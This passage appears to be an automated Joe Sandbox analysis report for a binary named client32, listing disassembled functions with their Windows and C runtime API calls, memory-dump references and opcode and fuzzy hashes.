                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExtractFileIconModuleName
                                                                                                • String ID:
                                                                                                • API String ID: 3911389742-0
                                                                                                • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                                • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                                • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                                Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                • __lock_file.LIBCMT ref: 11164CBE
                                                                                                  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                                • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2800547568-0
                                                                                                • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                                                • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                                                • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                                                Function 69CF6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 69CF6C26
                                                                                                • Sleep.KERNEL32(00000064), ref: 69CF6C5B
                                                                                                  • Part of subcall function 69CF6940: GetTickCount.KERNEL32 ref: 69CF6950
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 4250438611-0
                                                                                                • Opcode ID: f14fa07af11ca6ee040f31e8791be830c8208a2f282e887052611d89a04e596f
                                                                                                • Instruction ID: 8e45ce4bd9c3c259cb5ecdc3e22d9b5d980bc9dcb84ec1e9459ec7d266062130
                                                                                                • Opcode Fuzzy Hash: f14fa07af11ca6ee040f31e8791be830c8208a2f282e887052611d89a04e596f
                                                                                                • Instruction Fuzzy Hash: 17F08231600648CBEF54DF75E755318B3A1EF62359F12807AC652A6580EBB69C82CB01
                                                                                                Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __lock.LIBCMT ref: 11176045
                                                                                                  • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                                  • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                                  • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                • __tzset_nolock.LIBCMT ref: 11176056
                                                                                                  • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                                  • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                                  • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                                  • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                                  • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                                  • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                                  • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                                  • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                                                • String ID:
                                                                                                • API String ID: 1828324828-0
                                                                                                • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                                                • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                                                • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                                                Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                                  • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                                                • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                • String ID:
                                                                                                • API String ID: 3768737497-0
                                                                                                • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                                                • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                                                • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                                                Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LockitLockit::_std::_
                                                                                                • String ID:
                                                                                                • API String ID: 3382485803-0
                                                                                                • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                                                • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                                                • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                                                Function 1100E300 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                                                • Instruction ID: 622d3808cb19fe645f7705ee54a54b225289d7132215defba9e18c77360d7652
                                                                                                • Opcode Fuzzy Hash: 6a4558929192b251c5d08b5e804bdc9b61ce28f30961faaa03d70a9527164016
                                                                                                • Instruction Fuzzy Hash: FE213C75E00269EBEB40CE69C88469D7BF5FF44360F14C1AAEC55EB241D774DE408B91
                                                                                                Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3660427363-0
                                                                                                • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                                                • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                                                • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                                                Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationToken
                                                                                                • String ID:
                                                                                                • API String ID: 4114910276-0
                                                                                                • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                                                • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                                                • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                                                Function 69D0A082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000008,69D06F16,00000000,?,69D0D40B,00000001,69D06F16,00000000,00000000,00000000,?,69D06F16,00000001,00000214), ref: 69D0A0C5
                                                                                                  • Part of subcall function 69D060F9: __getptd_noexit.LIBCMT ref: 69D060F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                • String ID:
                                                                                                • API String ID: 328603210-0
                                                                                                • Opcode ID: af67c2254d4b3d7c42a978b04bd2424ce905f5f2a49aa093e702c23fd3e575f8
                                                                                                • Instruction ID: ea2deee8ca5a9f0128071788fea7401d50e28b652e282a0edf3656fb015943d5
                                                                                                • Opcode Fuzzy Hash: af67c2254d4b3d7c42a978b04bd2424ce905f5f2a49aa093e702c23fd3e575f8
                                                                                                • Instruction Fuzzy Hash: 5401B13130521AEEFB158F25CE38B5B3754BF81374F01867AE829CB984DB759450C691
                                                                                                Function 69CF7D00 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __vswprintf
                                                                                                • String ID:
                                                                                                • API String ID: 597827344-0
                                                                                                • Opcode ID: 9d96db6f80c2ca1799a26e927335ed6c4f5b58a9d55a77b407914163ae924be3
                                                                                                • Instruction ID: 142a1ce190bcdb0d9678ed79b5d39173b974902e7d71b1ee8f80a3811c40a52f
                                                                                                • Opcode Fuzzy Hash: 9d96db6f80c2ca1799a26e927335ed6c4f5b58a9d55a77b407914163ae924be3
                                                                                                • Instruction Fuzzy Hash: F2E030B990111CABCB00EF54CC519EE73BCEF44214F4081A9EF0997141DB30AE168BA5
                                                                                                Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __waccess_s
                                                                                                • String ID:
                                                                                                • API String ID: 4272103461-0
                                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
